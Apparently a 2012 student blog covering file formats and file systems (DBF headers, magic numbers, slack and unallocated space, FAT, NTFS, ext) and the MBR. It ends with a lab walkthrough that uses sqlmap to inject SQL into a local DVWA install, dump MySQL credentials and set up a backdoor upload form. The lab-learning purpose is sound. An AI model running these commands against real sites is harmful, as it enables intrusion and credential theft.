Minggu, 18 Maret 2012

DBF File structure


Understanding Digital Image Formats

There are many digital image formats available for you to use, but only some of them are optimized for web use. For example, the TIFF image format is not designed for web use; it’s used for printing. Examples of image formats for the web are JPEG, PNG, GIF, and SVG.
Why are certain image formats suitable for the web, while others aren’t? Because images on the web must be optimized and highly compressed so that they don’t get too huge.
Some digital image formats, especially those designed for print (such as TIFF) are so unnecessarily high in resolution, metadata, and color-richness — which all become irrelevant when viewed in computer  monitors — that they are too big in file size for web use.


DBF file consists of a header record and data records. The header record defines the structure of dbf file and contains any other information related to the table. The header record starts at file position zero. Data records follow the header, in consecutive bytes, and contain the actual text of the fields.
Note   The data in dbf file starts at the position indicated in bytes 8 to 9 of the header record. Data records begin with a delete flag byte. If this byte is an ASCII space (0x20), the record is not deleted. If the first byte is an asterisk (0x2A), the record is deleted. The data from the fields named in the field subrecords follows the delete flag.
The length of a record, in bytes, is determined by summing the defined lengths of all fields. Integers in dbf files are stored with the least significant byte first.

DBF File Header

Byte offsetDescription
0DBF File type:
0x02   FoxBASE
0x03   FoxBASE+/Dbase III plus, no memo
0x30   Visual FoxPro
0x31   Visual FoxPro, autoincrement enabled
0x32   Visual FoxPro with field type Varchar or Varbinary
0x43   dBASE IV SQL table files, no memo
0x63   dBASE IV SQL system files, no memo
0x83   FoxBASE+/dBASE III PLUS, with memo
0x8B   dBASE IV with memo
0xCB   dBASE IV SQL table files, with memo
0xF5   FoxPro 2.x (or earlier) with memo
0xE5   HiPer-Six format with SMT memo file
0xFB   FoxBASE
1 - 3Last update (YYMMDD)
4 – 7Number of records in file
8 – 9Position of first data record
10 – 11Length of one data record, including delete flag
12 – 27Reserved
28Table flags:
0x01   file has a structural .cdx
0x02   file has a Memo field
0x04   file is a database (.dbc)
This byte can contain the sum of any of the above values. For example, the value 0x03 indicates the table has a structural .cdx and a Memo field.
29Code page mark
30 – 31Reserved, contains 0x00
32 – nField subrecords
The number of fields determines the number of field subrecords. One field subrecord exists for each field in the table.
n+1Header record terminator (0x0D)
n+2 to n+264Visual Foxpro only: A 263-byte range that contains the backlink, which is the relative path of an associated database (.dbc) file, information. If the first byte is 0x00, the file is not associated with a database. Therefore, database files always contain 0x00.

Field Subrecords Structure

Byte offsetDescription
0 – 10Field name with a maximum of 10 characters. If less than 10, it is padded with null characters (0x00).
11Field type:
C   –   Character
Y   –   Currency
N   –   Numeric
F   –   Float
D   –   Date
T   –   DateTime
B   –   Double
I   –   Integer
L   –   Logical
M   – Memo
G   – General
C   –   Character (binary)
M   –   Memo (binary)
P   –   Picture
+   –   Autoincrement (dBase Level 7)
O   –   Double (dBase Level 7)
@   –   Timestamp (dBase Level 7)
12 – 15Displacement of field in record
16Length of field (in bytes)
17Number of decimal places
18Field flags:
0x01   System Column (not visible to user)
0x02   Column can store null values
0x04   Binary column (for CHAR and MEMO only)
0x06   (0x02+0x04) When a field is NULL and binary (Integer, Currency, and Character/Memo fields)
0x0C   Column is autoincrementing
19 - 22Value of autoincrement Next value
23Value of autoincrement Step value
24 – 31Reserved



Magic Number

      In computer programming, the term magic number has multiple meanings. It could refer to one or more of the following:

Magic numbers are common in programs across many operating systems. Magic numbers implement strongly typed data and are a form of in-band signaling to the controlling program that reads the data type(s) at program run-time. Many files have such constants that identify the contained data. Detecting such constants in files is a simple and effective way of distinguishing between many file formats and can yield further run-time information.

  • Headers in ZIP files begin with "PK" (50 4B), the initials of Phil Katz, author of DOS compression utility PKZIP.
  • Microsoft Office document files start with D0 CF 11 E0, which is visually suggestive of the word "DOCFILE0".
  • WAD files start with IWAD or PWAD (for Doom), WAD2 (for Quake) and WAD3 (for Half-Life).
  • LLVM Bitcode files start with BC (0x42, 0x43)
  • Unicode text files encoded in UTF-16 often start with the Byte Order Mark to detect endianness (FE FF for big endian and FF FE for little endian). UTF-8 text files often start with the UTF-8 encoding of the same character, EF BB BF.
  • TIFF files begin with either II or MM followed by 42 as a two-byte integer in little or big endian byte ordering. II is for Intel, which uses little endian byte ordering, so the magic number is 49 49 2A 00MM is for Motorola, which uses big endian byte ordering, so the magic number is 4D 4D 00 2A.
  • etc

Unallocated space

What is unallocated space ?

Unallocated space, sometimes called “free space”, is logical space on a hard drive that the operating system, e.g Windows, can write to. To put it another way it is the opposite of “allocated” space, which is where the operating system has already written files to.

Examples

If the operating system writes a file to a certain space on the hard drive that part of the drive is now “allocated”, as the file is using it the space, and no other files can be written to that section. If that file is deleted then that part of the hard drive is no longer required to be “allocated” it becomes unallocated. This means that  new files can now be re-written to that location.

On a standard, working computer, files can only be written to the unallocated space.

If a newly formatted  drive is connected to a computer, virtually all of the drive space is unallocated space (a small amount of space will be taken up by files within the file system, e.g $MFT, etc). On a new drive the unallocated space is normally zeros, as files are written to the hard drive the zeros are over written with the file data


Working Example

Blank Drive

A freshly formatted (NTFS) 500 GB hard drive starts with 99.9% unallocated space; we will assume its 100% to make the maths slightly easier. All of the unallocated space will be zeros, literally 00 00 00 written on the hard drives.

If a 5 GB file, e.g a large movie, is placed on the drive, then there will be 1% (5 GB)  allocated space and 99% unallocated (495 GB)

If a 10 GB database file is now added to this hard drive there will be a total of 3 % (15 GB) of allocated space and 485 GB unallocated space. New files will only be written into the remaining unallocated space.

What happens when a file is deleted?

If the movie file, from the above example, is deleted the allocated space it was using will now become unallocated. I.e There will now be 2% allocated space (the 10 GB database) and 98% unallocated space.

However the data from the movie file is still on the hard drive, it does not just disappear, it just changes its status. This means that the following situation now exists:

There is 10 GB of allocated space and 490 GB of unallocated space.

Of the 490 GB, 485 GB would be all zeros, however 5 GB of the unallocated space would be the old movie data.

Until new files are written to the hard drive this movie file will remain deleted but still  recoverable from the hard drive. Even if new files are written it must overwrite the same unallocated space as the movie file, before the movie file is destroyed.

Unallocated space can only be accessed by specialist tools, and now directly from Windows. Such tools include:







SLACK SPACE

Slack space is an area between the end of a file and end of the last cluster or sector used by the file in quetion. Area is an area that will not be used again to store the information there, so the area is "wasted" useless. Slack space is common in file systems that use a large cluster size, while the file system that uses a small a small cluster size can organize the strorage media more effectively and efficiently. Amount of wasted disk space can be thought is estimated by multiplying the number of files (including the number of directories) with half the size of a cluster. For example, a 10 000 personal computer that stores files in a file system that uses a cluster size of 4 kilobytes will have approximately 10 000 x 2 MB~ = 20000 KB. On a large file server, slack space and even reached the size of tens of gigabytes.

Illustration of slack space on a hard drive

Slack space refers to portions of a hard drive that are not fully used by the current allocated file and which may contain data from a previously deleted file.

In the example above, saving a 768 byte file (named User_File.txt) requires only sector 1 and 1/2 of sector 2 in the cluster.  Depending on the operating system, the remaining 256 bytes in sector 2 might be filled with 1′s or 0′s or might simply remain intact.  Both sectors 3 and 4 would not be overwritten and are thus considered slack space.  If the slack space previously contained data from a deleted file, this information could be recovered with forensic tools. Additional Details Operating systems allocate files on a hard drive using clusters, which are a collection of contiguous sectors.  Because a cluster is the smaller allocation unit an operating system can address, if a file does not utilize the full cluster, a portion of the space remaining may not be overwritten and might contain data from a previously deleted file. For forensic analysts, it is important to understand that slace space is considered allocated space since it is part of an allocated cluster.  As such, special tools must be used to extract and analyse slace space.  An analysis of unallocated data will not contain any slack space data.






















Kamis, 15 Maret 2012

File Allocation Table (FAT)

*** FAT16

    FAT16 is a file system that uses the allocation unit that has a limit of up to 16-bit, so it can store up to 216 Units allocation (65536 pieces). This file system has a capacity limit of up to 4 Gigabyte sizes only. Allocation unit size used by the FAT16 partition depends on the capacity that was about to be formatted. if the partition size is less than 16 megabytes, then windows will use the FAT12 file system, and if the partition size larger than 16 megabytes, then windows will use the FAT16 file system. The following table contains information any operating system that supports the FAT16 file system.

How a file is stored in a FAT16 volume

Fat16 file system using the allocation unit (or cluster) as the smallest unit of how he can save the file. FAT16 supports the cluster from 1 to 128 sectors. furthemore, there is also a directory entry that provides enaough space to accommodate the file with a file name format 8.3 (eight plus three names the file name extension). Directory entries in FAT16 file system has an entry of 32 bytes for each of the files and subdirectories contained by the directory. The directory entry contains the following fields.

The organizational structure of the FAT16 file system is not too complicatedcomplicated. The files will be given the location of which was first discovered bythe file system in a partition. Furthermore, the file system will provide a number oflocations, called the cluster number, which is the address of the location of the cluster where the file begins. Each cluster contains a pointer (pointer) to the nextcluster for the same file, or an indication that the cluster in question is the end of the series of clusters of a file that is marked by the number base 16 (hexadecimal)0xFFFF (FAT16), or 0xFFF (FAT12). For example, in a file that uses 10 pieces ofthe cluster, the file will have 10 pieces of entries in the file allocation table, andalso 9 units link to the file allocation table, while the last cluster contains a sign thathe is the last cluster, and contains number 0xFFFF. Generally, the file systemstructure is called a linked-list structure.

*** FAT32

    FAT32 is a version of the FAT file system is the most recent, which was introduced when Microsoft released Windows 95 OEM Service Release 2 (Windows 95 OSR2). Table Windows operating system that supports the FAT32 file system is as follows.


Because it uses large file allocation table (32-bit), FAT32 can theoretically address on the allocation of up to 232  units (4,294,967,296 pieces). nevertheless, ist implementation, the number of allocation units that can be addressed by FAT32 is 228 (268 435 456 pieces). The maximum allocation unit size can reach 32 768 bytes (64 sectors), so that theoretically can put 8 terabytes (8192 gigabytes), although not recommended. in addition, the installation program a family of operating systems Windows NT 5.x upwards only allow the creation of up to 32 Gigabyte FAT32 partitions (if partitions larger than 32 GB, the Windows installation program only provides NTFS file system). In the Windows NT operating system installation 5.x and above, if the size of the partition on which Windows is installed less than 2 Gigabytes, the installation program uses the FAT16 file system, and vice versa, if the partition on which Windows is about to be installed more than 2 Gigabytes, the installation program will use the FAT32 file system.

FAT32 uses allocation unit size is smaller than the file system FAT12/FAT16, so FAT32 is more efficient when applied on a large partition (size greater than 512 Megabytes). The savings made by comparison with FAT16/FAT12 FAT32 is approximately 20% to 27%. Windows 98 has a utility that can be used to convert the FAT16 partition to FAT32 without losing data.

*** NTFS (New Technology File System)

NTFS on first introduced in Windows NT and the file system that is completelydifferent compared to FAT technology. NTFS offers better security, filecompression, clusters, and even support data encryption. NTFS is the default file system for Windows XP and Windows if you do a regular upgrade you will beasked whether you want to upgrade to NTFS or keep using FAT. But if you areupgrading to Windows XP and NTFS do not make changes did not matterbecause you can convert it to NTFS at any time. But remember that if you areusing NTFS will arise a problem if you want to downgrade to FAT without losingdata.
On NTFS generally not compatible with other Operating System installed on the same computer (Double OS) was not detected even when you do a startup-bootusing a floppy. For it is advisable to you to provide a small partition that uses theFAT file system at the beginning of the partition. This partition allows you to save the Recovery Tool if get into trouble.


*** Ext 2 (2rd Extented)


EXT2 is a powerful file system in linux. EXT2 is also one of the most powerful filesystem and the foundation of all linux distributions. In the EXT2 file system, filedata is stored as data blocks. This block of data has the same length, andalthough the length varies between EXT2 file system, a large block is determined when the file system is created with the command mk2fs. If a large block is 1024bytes, then a large file with 1025 bytes will be wearing two blocks. This means thatwe throw away a half a block per file.
EXT2 defines the file system topology by providing the sense that every file on the system diasosiasiakan the inode data structure. A shows the block where theinode in a file on every file access rights, file modification time, and file type. Eachfile in the EXT2 file system consists of a single inode and each inode has a unique identification number. Inode inode-stored in the file system inode table.Directory in the EXT2 file system is a special file that contains a pointer to theinode of each directory contents.


*** Ext 3 (3rd Extended)
Is increased from EXT2 EXT3 file system. This increase has several advantages,including:
a.Setelah failure of resources, "unclean shutdown", or damage to the system,EXT2 file system must go through the process of checking with e2fsck program.This process can be a waste of time so that the boot process becomes very long,especially for large disk that contains lots of data. In this process, all data inaccessible.
Provided by the journal EXT3 cause no longer need to be checked the data aftera system failure. EXT3 is only checked if there is damage to hardware such ashard disk damage, but these events are very rare. The time required EXT3 filesystem after an "unclean shutdown" does not depend on the size of the file systemor file number, but depending on the size of the journal used to maintain consistency. Default of the journal takes about a second to recover, depending on the speed of hardwareData b.Integritas EXT3 ensure data integrity after damage or "unclean shutdown". EXT3 lets you choose the type of protection and types of data. c.Kecepatan Instead of writing data more than once, EXT3 has a greater throughput than EXT3EXT2 for maximizing hard disk head movement. We can choose three journalmode to maximize the speed, but data integrity is not assured. d.Mudah do migration We can move from EXT2 to EXT3 system without reformatting.














































Rabu, 14 Maret 2012

Master Boot Recording (MBR)

 MBR is also sometimes referred to as the master boot block and master partition boot sector. the MBR is the first sector of the computer hard disk drive that tells the computer how to load the operating system, how the hard drive is partitioned, and how to load the operating systems.

in the above picture, is an example of what a partitioned hard disk  drive my look like. in this case, the MBR is the first section of the hard disk drive the computer looks at after the BIOS hands control to the first bootable drive. unlike the VBR, there is always only going to be a maximum of one MBR on a partitioned hard drive.

The MBR is also susceptible to boot sector viruses that can corrupt ro remove the MBR, which can leave the hard drive unusable and prevent the computer from booting up. for example, the stone empire monkey virus is an example a MBR virus.

Senin, 05 Maret 2012

SQL INJECTION DVWA (MEDIUM)

This case i using Backtrack 5 r1 to be Server.

1. access dvwa  "http://192.168.56.1/dvwa"

user name : admin
password : password
2.  security using MEDIUM


3. Open Mantra and brupsuit

on the mantra following refuse step

create proxy for brupsuit

open brupsuite


4. Using proxy brupsuite and then using '

showing in url


result in brupsuite


5. Run sql map
root@bt:/pentest/database/sqlmap# 


Showing result


search Table



Search column



Now we can see user and password

showing





6.  Ok we get the password but Our Mission is how to make backdoor in the server.. hhmmm so we must try exploit service.. i will try service mysql.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=33486pplno180m3afq6jpjout3" --dbs


I have to done a lot of ways but.. i can't upload backdoor.. to be continue...
=======================================================================

After i try again wity repeat based ways..

>>>root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql --tables



>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -T user --column


>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -C password --dump


>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" --users --password



we can see that we get is same password

>>> i try open mysql

i'm using password : root 
and we can see i manage database.. we will try open phpmyadmin

>>> localhost/phpmyadmin
user : root
password : root



>>> Created database
Sinobi_db;

>>> Created table form

>>> Created table upload


>>> Crated Form form for upload.. "way for Backdoor"
insert the data into table camp

>>> Insert data into table upload